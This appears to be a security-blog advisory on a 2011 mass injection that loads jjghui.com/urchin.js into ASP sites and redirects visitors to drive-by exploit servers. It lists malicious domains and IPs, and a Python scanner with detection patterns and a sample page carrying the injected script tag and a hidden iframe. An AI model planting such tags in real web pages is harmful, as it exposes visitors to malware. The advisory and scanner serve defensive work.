http://jjghui.com/urchin.js mass infection ongoing

(Credit: Wayne Huang, Chris Hsiao, NightCola Lin)
Starting Oct 9th, we've been tracing a mass injection attempt. Currently there have been 180,000 affected pages, according to Google.


The attack targets visitors whose browsers report one of six particular languages--English, German, French, Italian, Polish, and Breton--as seen in the following deobfuscated script:



Here is a text version of the above decoded script.

The script causes the visiting browser to load an iframe, first from www3.strongdefenseiz.in and then from www2.safetosecurity.rr.nu. Multiple browser-based drive-by download exploits are served depending on the visiting browser.

In a drive-by download attack, visitors who navigate to the infected websites have malware installed on their machines without their knowledge, provided they are running an outdated browsing platform (browser, Adobe PDF reader, Adobe Flash, Java, etc.).

This wave of mass injection is targeting ASP and ASP.NET websites.

Currently, 6 out of 43 antivirus vendors on VirusTotal detect the dropped malware.


jjghui.com resolves to IP 146.185.248.3 (AS3999), which is in Russia. www3.strongdefenseiz.in resolves to 75.102.21.121 (AS36352), which is in the US and hosted by HostForWeb.com. www2.safetosecurity.rr.nu resolves to IP 67.208.74.71 (AS33597), which is in the US and hosted by InfoRelayOnlineSystems.

The dropped malware attempts to connect to: 65.98.83.115 (AS25653), which is in the US.

[Details]

1. ASP and ASP.NET websites are injected with the following script (text is here):


2. The contents of urchin.js are as seen below; full text is here.


3. The above script decodes to the following:

Here is a text version of the above decoded script.

4. The above script generates an iframe to www3.strongdefenseiz.in, which gives an HTTP 302 redirect to the exploit server at www2.safetosecurity.rr.nu.
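A defender's first question on an affected host is which pages carry the injected loader tag or an iframe to the redirect chain. The following scanner is an added example (not Armorize's code and not the attack script); its indicator hostnames are the ones named in this post and its comments, the sample page is constructed, and it deliberately looks for the plain tags only, not the obfuscated body of urchin.js.

```python
import re
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, List

# Hostnames named in the post and its comments (indicators, not an exhaustive list).
LOADER_HOSTS = ("jjghui.com", "nbnjki.com")
IFRAME_HOSTS = (
    "www3.strongdefenseiz.in", "www2.safetosecurity.rr.nu",
    "www3.bestyud-master.rr.nu", "www3.simplellantivir.rr.nu",
    "www3.thebest-peguard.rr.nu", "www3.strongazsuite.in",
)

# Injected loader: <script src="http://jjghui.com/urchin.js"></script>, any quoting/case.
SCRIPT_RE = re.compile(
    r"<script[^>]*\bsrc\s*=\s*['\"]?\s*(?:https?:)?//("
    + "|".join(map(re.escape, LOADER_HOSTS)) + r")/urchin\.js", re.IGNORECASE)
# First-stage iframe to one of the known redirect/exploit hosts.
IFRAME_RE = re.compile(
    r"<iframe[^>]*\bsrc\s*=\s*['\"]?\s*(?:https?:)?//("
    + "|".join(map(re.escape, IFRAME_HOSTS)) + r")\b", re.IGNORECASE)

@dataclass
class Finding:
    kind: str   # "loader" or "iframe"
    host: str
    line: int   # 1-based line of the match, tags spanning lines included

def find_injections(html: str) -> List[Finding]:
    """Return every loader/iframe indicator found in one page's markup, in order."""
    findings = []
    for kind, pattern in (("loader", SCRIPT_RE), ("iframe", IFRAME_RE)):
        for m in pattern.finditer(html):
            lineno = html.count("\n", 0, m.start()) + 1
            findings.append(Finding(kind, m.group(1).lower(), lineno))
    findings.sort(key=lambda f: f.line)
    return findings

def scan_tree(root: str, suffixes=(".asp", ".aspx", ".html", ".htm", ".js")) -> Dict[str, List[Finding]]:
    """Walk a web root and map each file with hits to its findings."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = find_injections(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed sample page (not a real capture): loader tag appended after </html>.
SAMPLE_PAGE = """<html><body><h1>Welcome</h1>
</body></html><script src="http://jjghui.com/urchin.js"></script>
<IFRAME SRC='http://www3.strongdefenseiz.in/' width=1 height=1></IFRAME>"""

if __name__ == "__main__":
    for f in find_injections(SAMPLE_PAGE):
        print(f"line {f.line}: {f.kind} -> {f.host}")
```

Because the injection here lives in the served markup rather than in a static file, run find_injections over the rendered output of your ASP/ASP.NET pages (or over dumped database columns) as well as over the web root.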

39 comments:

Jason D.Seimesi said...

Here are some other domains to add to the list:

75.102.21.121 www3.bestyud-master.rr.nu
75.102.21.121 www3.simplellantivir.rr.nu
75.102.21.121 www3.thebest-peguard.rr.nu
75.102.21.121 www3.strongdefenseiz.in
75.102.21.121 www3.strongdefenseiz.in
75.102.21.121 www3.strongazsuite.in

Regards,

Wayne Huang said...

Thank you Jason!

Asasfasff Asfasf said...

VirusTotal link doesn't work

Wayne Huang said...

Fixed: http://www.virustotal.com/file-scan/report.html?id=1ba709f9c643260b82419c61ab7c21b428226a97642e575f4066a4847c3877aa-1318447706

joe said...

It'd be interesting to know what file would have been executed on the victim's machine; you didn't show that!

joe said...

Or if scandsk.exe was the only file executed you could have posted it here.

03storic said...

They are also using http://nbnjki.com/urchin.js now

Anonymous said...

Does anyone know what the initial SQL injection attack vector was?

Anonymous said...

So it's not a SQL injection attack? The NetworkWorld article that brought me here indicated a mass SQL injection attack:

http://www.networkworld.com/news/2011/101911-sql-injection-attack-252188.html


inidaho said...

Would love to see what the attack vector in the logs looked like too.

Leonardo said...

Is it possible that the script sends all XML files located in %appdata%/Filezilla to a remote server?
Has anyone tried to track what kind of commands the script executes in a virtual machine?

mo3s said...

I have an ASP.NET site. The code is clean. I put it online, and this bastard appears. It is not the DB, right? Should I ask my hosting provider, since it is not on my side? In other words... who do I blow to get this removed?


Darren said...

Yeah me as well. Would be interesting to find out
http://speed-up-pc.org


water damage said...

Just had Webmaster Tools hit me with a similar warning... thanks for the info.
